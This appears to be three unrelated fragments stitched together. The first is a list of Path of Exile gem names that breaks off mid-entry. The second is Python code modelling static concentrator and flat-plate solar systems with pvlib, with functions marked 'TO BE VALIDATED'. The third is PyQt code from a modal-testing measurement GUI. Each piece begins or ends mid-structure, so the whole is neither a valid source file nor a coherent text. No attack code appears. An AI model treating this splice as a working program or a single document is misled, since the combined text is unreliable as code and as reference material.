"Enduring Cry",
"Discipline",
"Flame Dash",
"Knockback Support",
"Burning Arrow",
"Bear Trap",
"Summon Holy Relic",
"Unleash Support",
"Second Wind Support",
"Fork Support",
"Herald of Purity",
"Herald of Purity",
"Increased Duration Support",
"Purity of Elements",
"Shockwave Totem",
"Shockwave Support",
"Leap Slam",
"Bladefall",
"Charged Traps Support",
"Seismic Trap",
"Creeping Frost",
"Sniper's Mark",
"Glacial Cascade",
"Purity of Ice",
"Sigil of Power",
"Vaal Discipline",
"Blast Rain",
"Chain Support",
"Bone Offering",
"Trap and Mine Damage Support",
"Vaal Ancestral Warchief",
"Explosive Trap",
"Purity of Lightning",
"Bladefall",
"Anger",
"Sigil of Power",
"Infernal Blow",
"Additional Accuracy Support",
"Brutality Support",
"Tempest Shield",
"Purity of Elements",
"Wild Strike",
"Bonechill Support",
"Energy Leech Support",
"Crackling Lance",
"Spell Totem Support",
"Vicious Projectiles Support",
"Seismic Cry",
"Smite",
"Chain Hook",
"Puncture",
"Inspiration Support",
"Lightning Penetration Support",
"Arcanist Brand",
"Poacher's Mark",
"Greater Volley Support",
"Wild Strike",
"Arrow Nova Support",
"Purity of Elements",
"Point Blank Support",
"Bodyswap",
"Barrage Support",
"Bladefall",
"Purity of Fire",
"Decoy Totem",
"Vaal Grace",
"Shock Nova",
"Bladefall",
"Blood Magic Support",
"Lightning Strike",
"Firestorm",
"Desecrate",
"Heavy Strike",
"Explosive Trap",
"Dread Banner",
"Inspiration Support",
"Infernal Legion Support",
"High-Impact Mine Support",
"Spellslinger Support",
"Rune Blast",
"Urgent Orders Support",
"Awakened Lightning Penetration Support",
"Awakened Deadly Ailments Support",
"Frost Shield",
"Shock Nova",
"Bladestorm",
"Volatile Dead",
"Vaal Rain of Arrows",
"Dual Strike",
"Cobra Lash",
"Cast while Channelling Support",
"Decay Support",
"Kinetic Bolt",
"Vaal Power Siphon",
"Shock Nova",
"Efficacy Support",
"Charged Mines Support",
"Vaal Haste",
"Conductivity",
"Berserk",
"Awakened Burning Damage Support",
"Flesh and Stone",
"Kinetic Bolt",
"Vile Toxins Support",
"Armageddon Brand",
"Arcanist Brand",
"Elemental Army Support",
"Withering Step",
"Detonate Dead",
"Cold Penetration Support",
"Lancing Steel",
"Multiple Totems Support",
"Immortal Call",
"Cold to Fire Support",
"Shattering Steel",
"Infernal Blow",
"Determination",
"Kinetic Bolt",
"Storm Call",
"Power Siphon",
"Immortal Call",
"Storm Brand",
"Meat Shield Support",
"Awakened Void Manipulation Support",
"Hypothermia Support",
"Awakened Cast While Channelling Support",
"Multiple Traps Support",
"Ice Nova",
"Rain of Arrows",
"Vaal Molten Shell",
"Urgent Orders Support",
"Firestorm",
"Enfeeble",
"Cold Snap",
"Ruthless Support",
"Sigil of Power",
"Cluster Traps Support",
"Pinpoint Support",
"Summon Skitterbots",
"Consecrated Path",
"Iron Will Support",
"Sniper's Mark",
"Vaal Cold Snap",
"Shattering Steel",
"Awakened Unbound Ailments Support",
"Meat Shield Support",
"Bonechill Support",
"Dual Strike",
"Second Wind Support",
"Purity of Fire",
"Raise Spectre",
"Greater Multiple Projectiles Support",
"Elemental Proliferation Support",
"Tornado Shot",
"Clarity",
"Determination",
"Decay Support",
"Blight",
"Reckoning",
"Ice Shot",
"Cast on Melee Kill Support",
"Efficacy Support",
"Lightning Spire Trap",
"Devouring Totem",
"Divine Ire",
"Close Combat Support",
"Rage Support",
"Flesh and Stone",
"Hextouch Support",
"Flameblast",
"Arcanist Brand",
"Vaal Ice Nova",
"Perforate",
"Vaal Detonate Dead",
"Immolate Support",
"Despair",
"Riposte",
"Blade Blast",
"Chain Support",
"Holy Flame Totem",
"Clarity",
"Close Combat Support",
"Phase Run",
"Poison Support",
"Armageddon Brand",
"Physical to Lightning Support",
"Flesh Offering",
"Minion Life Support",
"Righteous Fire",
"Discharge",
"Berserk",
"Mirage Archer Support",
"Lightning Arrow",
"Purifying Flame",
"Swiftbrand Support",
"Increased Critical Damage Support",
"Ice Trap",
"Wave of Conviction",
"Stormblast Mine",
"Enlighten Support",
"Urgent Orders Support",
"Spectral Throw",
"Discharge",
"Swiftbrand Support",
"Signal Prey",
"Signal Prey",
"Frostblink",
"Vulnerability",
"Convocation",
"Vaal Spark",
"Fire Penetration Support",
"Malevolence",
"Withering Touch Support",
"Greater Volley Support",
"Ancestral Cry",
"Point Blank Support",
"Second Wind Support",
"Determination",
"Fist of War Support",
"Herald of Thunder",
"Charged Dash",
"Void Sphere",
"Sweep",
"Vaal Summon Skeletons",
"Cast on Death Support",
"Crackling Lance",
"Plague Bearer",
"Ballista Totem Support",
"Multiple Traps Support",
"Dash",
"General's Cry",
"Zealotry",
"Fork Support",
"Charged Traps Support",
"Wave of Conviction",
"Fist of War Support",
"Multiple Totems Support",
"Clarity",
"Sweep",
"Earthquake",
"Shield Charge",
"Pulverise Support",
"Additional Accuracy Support",
"Galvanic Arrow",
"Zealotry",
"Venom Gyre",
"Consecrated Path",
"Withering Step",
"Raise Zombie",
"Pyroclast Mine",
"Mana Leech Support",
"Trap Support",
"Bear Trap",
"Controlled Destruction Support",
"Hypothermia Support",
"Kinetic Blast",
"Physical to Lightning Support",
"Increased Duration Support",
"Earthquake",
"Ancestral Protector",
"Vaal Righteous Fire",
"Reckoning",
"Winter Orb",
"Impale Support",
"Pestilent Strike",
"Awakened Melee Splash Support",
"Blazing Salvo",
"Doom Blast",
"Lacerate",
"Frostbite",
"Blind Support",
"Herald of Thunder",
"Dark Pact",
"Shattering Steel",
"Arcane Cloak",
"Pestilent Strike",
"Cold to Fire Support",
"Shrapnel Ballista",
"Charged Mines Support",
"Wither",
"Penance Brand",
"Tempest Shield",
"Ice Spear",
"Charged Dash",
"Unleash Support",
"Blade Blast",
"Flammability",
"Chain Hook",
"Faster Projectiles Support",
"Physical to Lightning Support",
"Convocation",
"Elemental Proliferation Support",
"Conductivity",
"Storm Call",
"Cast on Death Support",
"Void Manipulation Support",
"Cremation",
"Magma Orb",
"Unbound Ailments Support",
"Frost Bomb",
"Fire Penetration Support",
"Herald of Agony",
"Elemental Weakness",
"Damage on Full Life Support",
"Generosity Support",
"Barrage Support",
"Tectonic Slam",
"Charged Mines Support",
"Elemental Weakness",
"Wither",
"Spell Cascade Support",
"Ignite Proliferation Support",
"Frostblink",
"Anger",
"Pride",
"Trap and Mine Damage Support",
"Burning Arrow",
"Bonechill Support",
"Wave of Conviction",
"Icicle Mine",
"Barrage Support",
"Intensify Support",
"Heavy Strike",
"Flame Surge",
"Vengeance",
"Frost Wall",
"Flicker Strike",
"Lightning Spire Trap",
"Riposte",
"Intensify Support",
"Divine Ire",
"Split Arrow",
"Enfeeble",
"War Banner",
"Added Chaos Damage Support",
"Winter Orb",
"Minion Speed Support",
"Cold Snap",
"Decay Support",
"Dash",
"Vaal Fireball",
"Pride",
"Brand Recall",
"Spell Cascade Support",
"Life Gain on Hit Support",
"Vulnerability",
"Cast on Death Support",
"Malevolence",
"Lesser Poison Support",
"Haste",
"Arcane Surge Support",
"Awakened Fire Penetration Support",
"Additional Accuracy Support",
"Summon Raging Spirit",
"Soulrend",
"Life Gain on Hit Support",
"Rage Support",
"Icicle Mine",
"Fire Penetration Support",
"Spell Echo Support",
"Vaal Impurity of Ice",
"Inspiration Support",
"Burning Damage Support",
"Vigilant Strike",
"Less Duration Support",
"Elemental Weakness",
"Detonate Dead",
"Unleash Support",
"Storm Brand",
"Infernal Cry",
"Melee Physical Damage Support",
"Smite",
"Wrath",
"Vitality",
"Ball Lightning",
"Increased Area of Effect Support",
"Minion Damage Support",
"Frost Bomb",
"Knockback Support",
"Sweep",
"Lacerate",
"Frost Blades",
"Innervate Support",
"Wrath",
"Storm Burst",
"Temporal Chains",
"Storm Burst",
"Molten Shell",
"Static Strike",
"Added Chaos Damage Support",
"Herald of Purity",
"Vaal Ground Slam",
"Ice Trap",
"Conversion Trap",
"Lancing Steel",
"Intensify Support",
"Elemental Army Support",
"Ballista Totem Support",
"Spellslinger Support",
"Ancestral Cry",
"Void Sphere",
"Sigil of Power",
"Spellslinger Support",
"Grace",
"Vaal Arc",
"Flicker Strike",
"Energy Leech Support",
"Phase Run",
"Arcane Surge Support",
"Arctic Armour",
"Frost Blades",
"Swift Affliction Support",
"Detonate Dead",
"Precision",
"Vaal Grace",
"Combustion Support",
"Flame Wall",
"Endurance Charge on Melee Stun Support",
"Double Strike",
"Pinpoint Support",
"Impale Support",
"Cobra Lash",
"Discipline",
"Summon Lightning Golem",
"Vaal Impurity of Lightning",
"Innervate Support",
"Burning Arrow",
"Barrage Support",
"Energy Leech Support",
"Iron Grip Support",
"Clarity",
"Ice Crash",
"Spirit Offering",
"Rallying Cry",
"Fork Support",
"Mirage Archer Support",
"Flame Wall",
"Hatred",
"Bone Offering",
"Elemental Focus Support",
"Ice Spear",
"Chance to Flee Support",
"Molten Strike",
"Burning Damage Support",
"Volatile Dead",
"Life Leech Support",
"Summon Skitterbots",
"Summon Chaos Golem",
"Fireball",
"Combustion Support",
"Bane",
"Purity of Elements",
"Blastchain Mine Support",
"Cold Snap",
"Blasphemy Support",
"High-Impact Mine Support",
"Sigil of Power",
"Multistrike Support",
"Life Gain on Hit Support",
"Ice Crash",
"Iron Grip Support",
"Spellslinger Support",
"Lightning Trap",
"Intensify Support",
"Feeding Frenzy Support",
"Feeding Frenzy Support",
"Cyclone",
"Cast On Critical Strike Support",
"Spectral Throw",
"Consecrated Path",
"Purity of Lightning",
"Physical to Lightning Support",
"Unearth",
"Cast when Stunned Support",
"Damage on Full Life Support",
"Rune Blast",
"Freezing Pulse",
"Ensnaring Arrow",
"Siphoning Trap",
"Spell Totem Support",
"Withering Step",
"Infernal Legion Support",
"Flame Surge",
"Bloodlust Support",
"Explosive Arrow",
"Ancestral | |
of a Static Flat Plate system
from dii and gii. If any is missing then is calculated from ghi, dhi and dhi
using corresponding pvlib function.
Internal `aoi_limit` parameter from `module_parameters` sets the limit
of tracking of the Static CPV system and therefore when the dii irradiance
is added to the poa_diffuse.
Spillage factor accounts for the dii fraction that is allowed to pass into the system
See https://doi.org/10.1002/pip.3387 for details
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : numeric
Direct Normal Irradiance
ghi : numeric
Global horizontal irradiance
dhi : numeric
Diffuse horizontal irradiance
dii : numeric
Direct (on the) Inclinated (plane) Irradiance
gii : numeric
Global (on the) Inclinated (plane) Irradiance
dni_extra : None or numeric, default None
Extraterrestrial direct normal irradiance
airmass : None or numeric, default None
Airmass
model : String, default 'isotropic'
Irradiance model.
spillage : float
Percentage of dii allowed to pass into the system
Returns
-------
poa_flatplate_static : numeric
Plane of Array Irradiance
"""
# not needed for all models, but this is easier
if dni_extra is None:
dni_extra = pvlib.irradiance.get_extra_radiation(
solar_zenith.index)
if airmass is None:
airmass = pvlib.atmosphere.get_relative_airmass(solar_zenith)
if self.in_singleaxis_tracker:
tracking_info = pvlib.tracking.singleaxis(
solar_zenith, solar_azimuth, **self.parameters_tracker)
surface_tilt = tracking_info.surface_tilt
surface_azimuth = tracking_info.surface_azimuth
else:
surface_tilt = self.surface_tilt
surface_azimuth = self.surface_azimuth
if dii is None:
dii = pvlib.irradiance.beam_component(
surface_tilt,
surface_azimuth,
solar_zenith,
solar_azimuth,
dni)
if gii is None:
irr = pvlib.irradiance.get_total_irradiance(surface_tilt,
surface_azimuth,
solar_zenith, solar_azimuth,
dni, ghi, dhi,
dni_extra=dni_extra,
airmass=airmass,
model=model,
albedo=self.albedo,
**kwargs)
poa_diffuse = irr['poa_diffuse']
gii = irr['poa_global']
else:
poa_diffuse = gii - dii
poa_diffuse += dii * spillage
aoi = self.get_aoi(solar_zenith, solar_azimuth)
if 'aoi_limit' in self.module_parameters:
aoi_limit = self.module_parameters['aoi_limit']
else:
raise AttributeError(
'Missing "aoi_limit" parameter in "module_parameters"')
poa_flatplate_static = pd.concat(
[poa_diffuse[aoi < aoi_limit], gii[aoi > aoi_limit]]).sort_index()
return poa_flatplate_static
def get_effective_irradiance(self, solar_zenith, solar_azimuth, dni=None,
ghi=None, dhi=None, dii=None, gii=None, dni_extra=None,
airmass=None, model='haydavies', spillage=0, aoi_thld=None, **kwargs):
"""
Calculates the effective irradiance (taking into account the IAM)
TO BE VALIDATED
Parameters
----------
solar_zenith : float or Series
Solar zenith angle.
solar_azimuth : float or Series
Solar azimuth angle.
dni : float or Series
Direct Normal Irradiance
Returns
-------
poa_flatplate_static_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance
Plane of array irradiance plus the effect of AOI
"""
poa_flatplate_static = self.get_irradiance(solar_zenith, solar_azimuth, dni=dni,
ghi=ghi, dhi=dhi, dii=dii, gii=gii, dni_extra=dni_extra,
airmass=airmass, model=model, spillage=spillage, **kwargs)
# * self.get_iam(
poa_flatplate_static_effective = poa_flatplate_static
# aoi=aoi, aoi_thld=aoi_thld, m1=1, b1=0, m2=1, b2=0)
return poa_flatplate_static_effective
def pvsyst_celltemp(self, poa_flatplate_static, temp_air, wind_speed=1.0):
"""
Uses :py:func:`pvsystem.pvsyst_celltemp` to calculate module
temperatures based on ``self.racking_model`` and the input parameters.
Parameters
----------
See pvsystem.pvsyst_celltemp for details
Returns
-------
See pvsystem.pvsyst_celltemp for details
"""
kwargs = _build_kwargs(['eta_m', 'alpha_absorption'],
self.module_parameters)
kwargs.update(_build_kwargs(['u_c', 'u_v'],
self.temperature_model_parameters))
return pvlib.temperature.pvsyst_cell(poa_flatplate_static, temp_air, wind_speed,
**kwargs)
class StaticHybridSystem():
"""
The StaticHybridSystem class defines a set of Static Hybrid system attributes and
modeling functions. This class describes the collection and interactions of
Static CPV system components installed on a Fixed Panel or a Single Axis tracker.
It is the composition of two subsystems: StaticCPVSystem and StaticFlatPlateSystem
The class supports basic system topologies consisting of:
* `N` total modules arranged in series
(`modules_per_string=N`, `strings_per_inverter=1`).
* `M` total modules arranged in parallel
(`modules_per_string=1`, `strings_per_inverter=M`).
* `NxM` total modules arranged in `M` strings of `N` modules each
(`modules_per_string=N`, `strings_per_inverter=M`).
The attributes should generally be things that don't change about
the system, such the type of module and the inverter. The instance
methods accept arguments for things that do change, such as
irradiance and temperature.
See https://doi.org/10.1002/pip.3387
Parameters
----------
surface_tilt: float or array-like, default 0
Surface tilt angles in decimal degrees.
The tilt angle is defined as degrees from horizontal
(e.g. surface facing up = 0, surface facing horizon = 90)
surface_azimuth: float or array-like, default 180
Azimuth angle of the module surface.
North=0, East=90, South=180, West=270.
module : None or string, default None
The model name of the modules.
May be used to look up the module_parameters dictionary
via some other method.
module_parameters : None, dict or Series, default None
Module parameters as defined by the SAPM, CEC, or other.
modules_per_string: int or float, default 1
See system topology discussion above.
strings_per_inverter: int or float, default 1
See system topology discussion above.
inverter : None or string, default None
The model name of the inverters.
May be used to look up the inverter_parameters dictionary
via some other method.
inverter_parameters : None, dict or Series, default None
Inverter parameters as defined by the SAPM, CEC, or other.
racking_model : None or string, default 'freestanding'
Used for cell and module temperature calculations.
losses_parameters : None, dict or Series, default None
Losses parameters as defined by PVWatts or other.
in_singleaxis_tracker : None or bool, defult False
Conttros if the system is mounted in a NS single axis tracker
If true, it affects get_aoi() and get_irradiance()
name : None or string, default None
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
"""
def __init__(self,
surface_tilt=30,
surface_azimuth=180,
module_cpv=None,
module_parameters_cpv=None,
temperature_model_parameters_cpv=None,
module_flatplate=None,
module_parameters_flatplate=None,
temperature_model_parameters_flatplate=None,
in_singleaxis_tracker=False,
parameters_tracker=None,
modules_per_string=1,
strings_per_inverter=1,
inverter=None,
inverter_parameters=None,
racking_model="insulated",
losses_parameters=None,
name=None,
**kwargs):
self.name = name
self.surface_tilt = surface_tilt
self.surface_azimuth = surface_azimuth
# could tie these together with @property
self.module_cpv = module_cpv
self.module_flatplate = module_flatplate
self.in_singleaxis_tracker = in_singleaxis_tracker
if module_parameters_cpv is None:
self.module_parameters_cpv = {}
else:
self.module_parameters_cpv = module_parameters_cpv
if module_parameters_flatplate is None:
self.module_parameters_flatplate = {}
else:
self.module_parameters_flatplate = module_parameters_flatplate
if parameters_tracker is None:
self.parameters_tracker = {}
else:
self.parameters_tracker = parameters_tracker
self.modules_per_string = modules_per_string
self.strings_per_inverter = strings_per_inverter
self.inverter = inverter
if inverter_parameters is None:
self.inverter_parameters = {}
else:
self.inverter_parameters = inverter_parameters
if losses_parameters is None:
self.losses_parameters = {}
else:
self.losses_parameters = losses_parameters
self.racking_model = racking_model
self.static_cpv_sys = StaticCPVSystem(
surface_tilt=surface_tilt,
surface_azimuth=surface_azimuth,
module=module_cpv,
module_parameters=module_parameters_cpv,
temperature_model_parameters=temperature_model_parameters_cpv,
in_singleaxis_tracker=in_singleaxis_tracker,
modules_per_string=modules_per_string,
strings_per_inverter=strings_per_inverter,
inverter=inverter,
inverter_parameters=inverter_parameters,
racking_model=racking_model,
losses_parameters=losses_parameters,
name=name,
)
self.static_flatplate_sys = StaticFlatPlateSystem(
surface_tilt=surface_tilt,
surface_azimuth=surface_azimuth,
module=module_flatplate,
module_parameters=module_parameters_flatplate,
temperature_model_parameters=temperature_model_parameters_flatplate,
in_singleaxis_tracker=in_singleaxis_tracker,
modules_per_string=modules_per_string,
strings_per_inverter=strings_per_inverter,
inverter=inverter,
inverter_parameters=inverter_parameters,
racking_model=racking_model,
losses_parameters=losses_parameters,
name=name,
)
def __repr__(self):
attrs = ['name', 'module_cpv', 'module_flatplate',
'inverter', 'racking_model']
return ('StaticHybridSystem: \n ' + '\n '.join(
('{}: {}'.format(attr, getattr(self, attr)) for attr in attrs)))
def get_effective_irradiance(self, solar_zenith, solar_azimuth, dni,
ghi=None, dhi=None, dii=None, gii=None, dni_extra=None,
airmass=None, model='haydavies', spillage=0, **kwargs):
"""
Calculates the effective irradiance (taking into account the IAM)
TO BE VALIDATED
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : numeric
Direct Normal Irradiance
ghi : numeric
Global horizontal irradiance
dhi : numeric
Diffuse horizontal irradiance
dii : numeric
Direct (on the) Inclinated (plane) Irradiance
gii : numeric
Global (on the) Inclinated (plane) Irradiance
dni_extra : None or numeric, default None
Extraterrestrial direct normal irradiance
airmass : None or numeric, default None
Airmass
model : String, default 'isotropic'
Irradiance model.
spillage : float
Percentage of dii allowed to pass into the system
Returns
-------
dii_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance [StaticCPVSystem]
Beam component of the plane of array irradiance plus the effect of AOI
poa_flatplate_static_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance [StaticFlatPlateSystem]
Plane of array irradiance plus the effect of AOI
"""
dii_effective = self.static_cpv_sys.get_effective_irradiance(
solar_zenith, solar_azimuth, dni)
aoi = self.static_flatplate_sys.get_aoi(solar_zenith, solar_azimuth)
poa_flatplate_static_effective = self.static_flatplate_sys.get_effective_irradiance(solar_zenith,
solar_azimuth,
aoi=aoi,
dii=dii,
gii=gii,
ghi=ghi,
dhi=dhi,
dni=dni,
model=model,
spillage=spillage,
**kwargs
)
return dii_effective, poa_flatplate_static_effective
def pvsyst_celltemp(self, dii, poa_flatplate_static, temp_air, wind_speed=1.0):
"""
Uses :py:func:`pvsystem.pvsyst_celltemp` to calculate module
temperatures based on ``self.racking_model`` and the input parameters.
Parameters
----------
dii : numeric
Direct (on the) Inclinated (plane) Irradiance [StaticCPVSystem]
poa_flatplate_static : numeric
Plane of Array Irradiance [StaticFlatPlateSystem]
See pvsystem.pvsyst_celltemp for details
Returns
-------
See pvsystem.pvsyst_celltemp for details
"""
celltemp_cpv = self.static_cpv_sys.pvsyst_celltemp(
dii, temp_air, wind_speed)
celltemp_flatplate = self.static_flatplate_sys.pvsyst_celltemp(
poa_flatplate_static, temp_air, wind_speed)
return celltemp_cpv, celltemp_flatplate
def calcparams_pvsyst(self, dii, poa_flatplate_static, temp_cell_cpv, temp_cell_flatplate):
"""
Use the :py:func:`calcparams_pvsyst` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
dii : numeric
Direct (on the) Inclinated (plane) Irradiance | |
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText('Looks like there are no hardware interfaces configured. Plese do so using the'
' preferences menu.')
connectButton = msgBox.addButton(self.tr('Take me to preferences'), QtWidgets.QMessageBox.ActionRole)
msgBox.setStandardButtons(QtWidgets.QMessageBox.Cancel)
ret = msgBox.exec_()
if msgBox.clickedButton() == connectButton:
self.open_configuration_window()
self.button_run.blockSignals(True)
self.button_run.toggle()
self.button_run.blockSignals(False)
return False
else:
if self.button_run.isChecked():
# Start measurement.
print ('Started measurement.')
print ('checked state:', self.button_run.isChecked())
self.start_measurement()
self.button_run.setIcon(qta.icon('fa.stop', color='white', scale_factor=1.6))
self.button_run.setText(' Stop')
else:
# Stop measurement.
print('Stopping measurement.')
print ('checked state:', self.button_run.isChecked())
self.stop_routine()
self.button_run.setIcon(qta.icon('fa.play', color='white', scale_factor=1.6))
self.button_run.setText(' Measure')
def _add_new_model(self):
# pop dialog window.
dialog = QtWidgets.QDialog()
dialog.setWindowTitle('New Model')
input_layout = QtWidgets.QHBoxLayout()
model_name_edit = QtWidgets.QLineEdit()
rxval = QtGui.QRegExpValidator(QtCore.QRegExp('[A-Za-z_-][A-Za-z0-9_- ]{2,20}'))
model_name_edit.setValidator(rxval)
model_name_label = QtWidgets.QLabel('Model name')
input_layout.addWidget(model_name_label)
input_layout.addWidget(model_name_edit)
button_layout = QtWidgets.QHBoxLayout()
button_ok = QtWidgets.QPushButton('Accept')
button_ok.setDefault(True)
button_ok.setDisabled(True)
button_ok.clicked.connect(dialog.accept)
button_cancel = QtWidgets.QPushButton('Dismiss')
button_cancel.clicked.connect(dialog.reject)
button_layout.addWidget(button_cancel)
button_layout.addWidget(button_ok)
def check():
if model_name_edit.hasAcceptableInput():
button_ok.setEnabled(True)
else:
button_ok.setDisabled(True)
model_name_edit.textEdited.connect(check)
layout = QtWidgets.QVBoxLayout()
layout.addLayout(input_layout)
layout.addLayout(button_layout)
dialog.setLayout(layout)
accepted = dialog.exec_()
if accepted:
self.modaldata.new_model(entries=dict(model_name=model_name_edit.text()))
self.reload()
self.button_model.setCurrentIndex(self.button_model.count()-1)
else:
self.button_model.setCurrentIndex(self.button_model.currentIndex())
def update_table_model_id(self):
try:
model_id = self.modaldata.tables['info'].model_id.values[self.button_model.currentIndex()]
except IndexError:
model_id = self.modaldata.tables['info'].model_id.min()
self.table_model.update(self.modaldata.tables['measurement_index'], model_id)
idx_m = self.modaldata.tables['measurement_index']
idx_m = idx_m[idx_m.model_id == self.button_model.currentIndex()]
val_m = self.modaldata.tables['measurement_values']
# TODO: Do some smart(er) node (ref/resp) numbering. Connect with geometry.
if idx_m.shape[0] == 0:
ref_node = 1
rsp_node = 1
else:
last_line = idx_m.tail(1)
if self.button_roving.currentIndex() == 0:
ref_node = last_line.ref_node.values[0] + 1
rsp_node = last_line.rsp_node.values[0]
else:
ref_node = last_line.ref_node.values[0]
rsp_node = last_line.rsp_node.values[0] + 1
self.ref_node_spin.setValue(ref_node)
self.resp_node_spin.setValue(rsp_node)
def reload(self, *args, **kwargs):
"""Called when data is loaded/imported."""
selected_model_id = self.settings['selected_model_id']
if 'task_name' in self.settings:
try:
i = dq.DAQTask(self.settings['task_name'])
except dq.DAQError:
del self.settings['task_name']
# Update models list.
self.modaldata.tables['info'].sort_values('model_id', inplace=True)
models = self.modaldata.tables['info'].model_name
# old_model_index = self.button_model.currentIndex()
self.button_model.clear()
self.button_model.addItems(models.values)
self.button_model.setCurrentIndex(selected_model_id)
# self.button_model.setCurrentIndex(old_model_index)
self.button_overload.setStyleSheet('color: lightgray')
self.button_doublehit.setStyleSheet('color: lightgray')
try:
model_id = self.modaldata.tables['info'].model_id.values[self.button_model.currentIndex()]
except IndexError:
model_id = self.modaldata.tables['info'].model_id.min()
self.table_model.update(self.modaldata.tables['measurement_index'], model_id)
# Update with preferences also.
# TODO: Check which channel is the excitation channel.
# TODO: Pull correct units!
units_glossary = dict(a=['Acceleration','g', 'Acceleration PSD', 'g^2/Hz'],
v=['Velocity','m/s', 'Velocity PSD', '(m/s)^2/Hz'],
d=['Displacement', 'mm', 'Displacement PSD', 'mm^2/Hz'],
e=['Strain', '/', 'Strain PSD', '(/)^2/Hz'],
f=['Force', 'N', 'Force PSD', 'N^2/Hz'],
mixed=['Mixed', 'mixed', 'Mixed PSD', 'mixed^2/Hz'])
exc_idx = self.settings['exc_channel']
units_exc_idx = self.settings['channel_types'][exc_idx]
self.fig_exc.setLabel('left', units_glossary[units_exc_idx][0], units=units_glossary[units_exc_idx][1])
self.fig_exc.setLabel('bottom', 'Time', units='s')
# -- Check units consistency.
response_indices = self.settings['resp_channels']
channel_types = [self.settings['channel_types'][idx] for idx in response_indices]
if channel_types[1:] == channel_types[:-1]:
# units are consistent
units_resp_idx = channel_types[0]
else:
units_resp_idx = 'mixed'
# resp_idx = self.settings['resp_channels'][0]
# units_resp_idx = self.settings['channel_types'][resp_idx]
self.fig_resp.setLabel('left', units_glossary[units_resp_idx][0], units=units_glossary[units_resp_idx][1])
self.fig_resp.setLabel('bottom', 'Time', units='s')
if self.settings['excitation_type'] != self.excitation_type_old:
print('Exc type changed')
# -- Only do this if excitation type was changed. See self.open_configuration_window(...)
if self.settings['excitation_type'] == 'impulse':
# Prepare for impulse measurement.
self.dock_area.moveDock(self.dock_measurement, 'top', self.dock_estimators)#, self.dock_estimators)
self.dock_area.moveDock(self.dock_estimators, 'bottom', self.dock_measurement)#, self.dock_estimators)
self.excitation_type_old = 'impulse'
self.average_counter.setText('')
elif self.settings['excitation_type'] == 'random' or self.settings['excitation_type'] == 'oma':
# Prepare for random measurement.
self.dock_area.moveDock(self.dock_estimators, 'above', self.dock_measurement)
self.excitation_type_old = self.settings['excitation_type']
self.average_counter.setText('Pass 0 of {0}'.format(self.settings['n_averages']))
# self.clock.show()
else:
raise ValueError('Wrong excitation type.')
# -- Set axes labels and units.
self.fig_h_mag.setXLink(self.fig_h_phi)
self.fig_exc_zoom.setLabel('left', units_glossary[units_exc_idx][0], units=units_glossary[units_exc_idx][1])
self.fig_exc_zoom.setLabel('bottom', 'Time - Zoom', units='s')
self.fig_exc_frq.setLabel('left', units_glossary[units_exc_idx][2], units=units_glossary[units_exc_idx][3])
self.fig_exc_frq.setLabel('bottom', 'Frequency', units='Hz')
self.fig_h_mag.setLabel('bottom', 'Frequency', units='Hz')
self.fig_h_mag.setLabel('left', units_glossary[units_resp_idx][2], units=units_glossary[units_resp_idx][3])
self.fig_h_phi.setLabel('bottom', 'Frequency', units='Hz')
self.fig_h_phi.setLabel('left', 'Phase', units='rad')
# TODO: What about coherence? lejterzzz
# self.fig_h_mag.showAxis('right')
if 'Ref. node' in self.settings['roving_type']:
self.button_roving.setCurrentIndex(0)
else:
self.button_roving.setCurrentIndex(1)
def refresh(self, *args, **kwargs):
self.reload(*args, **kwargs)
def remove_selected(self):
"""Remove selected rows."""
# First, get measurement IDs (unique for that table) for the selected rows.
# measurement_ids = [self.modaldata.tables['measurement_index'].iloc[model.row()].measurement_id
# for model in self.table_view.selectedIndexes()]
current_index = self.button_model.currentIndex()
model_id = self.modaldata.tables['info'].model_id.values[current_index]
active_data = self.modaldata.tables['measurement_index'][self.modaldata.tables['measurement_index'].model_id == model_id]
measurement_ids = [active_data.iloc[model.row()].measurement_id
for model in self.table_view.selectedIndexes()]
# Then remove from measurement_index and measurement_values at that same measurement_id.
self.modaldata.tables['measurement_index'] = self.modaldata.tables['measurement_index'][~self.modaldata.tables['measurement_index'].measurement_id.isin(measurement_ids)]
self.modaldata.tables['measurement_values'] = self.modaldata.tables['measurement_values'][~self.modaldata.tables['measurement_values'].measurement_id.isin(measurement_ids)]
self.modaldata.tables['measurement_values_td'] = self.modaldata.tables['measurement_values_td'][~self.modaldata.tables['measurement_values_td'].measurement_id.isin(measurement_ids)]
self.reload()
self.button_model.setCurrentIndex(current_index)
def setup_measurement_thread(self):
"""Prepare for measurement."""
# self.process = mt.Impact()
if dp is None:
class Empty(object):
def stop_process(self):
pass
self.process = Empty()
return False
self.process = dp.MeasurementProcess()
self.process.start_process()
def stop_measurement_button_routine():
# self.process.run_flag.value = False
self.process.stop_measurement()
self.timer.stop()
# self.button_save_raw.setEnabled(True)
self.stop_routine = stop_measurement_button_routine
def start_measurement(self):
"""Start measuring."""
self.button_accept_measurement.setDisabled(True)
self.button_repeat_measurement.setDisabled(True)
self.button_doublehit.setStyleSheet('color: lightgray')
self.button_overload.setStyleSheet('color: lightgray')
# -- Initialize plots.
self.fig_exc.clear()
self.fig_resp.clear()
self.fig_exc_zoom.clear()
self.fig_exc_frq.clear()
self.fig_h_mag.clear()
self.fig_h_phi.clear()
if hasattr(self, 'view_legend_mag'):
self.view_legend_mag.scene().removeItem(self.view_legend_mag)
self.view_legend_mag = self.fig_h_mag.addLegend()
exc_curve = self.fig_exc.plot(pen=pg.mkPen({'color':'#bdc3c7'}))
self.fig_exc.enableAutoRange('x', True)
self.fig_exc.enableAutoRange('y', True)
if self.settings['excitation_type'] == 'oma':
self.fig_h_mag_pen = [self.fig_h_mag.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels'])+1)]
self.fig_h_phi_pen = [self.fig_h_phi.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels'])+1)]
else:
self.fig_h_mag_pen = [self.fig_h_mag.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels']))]
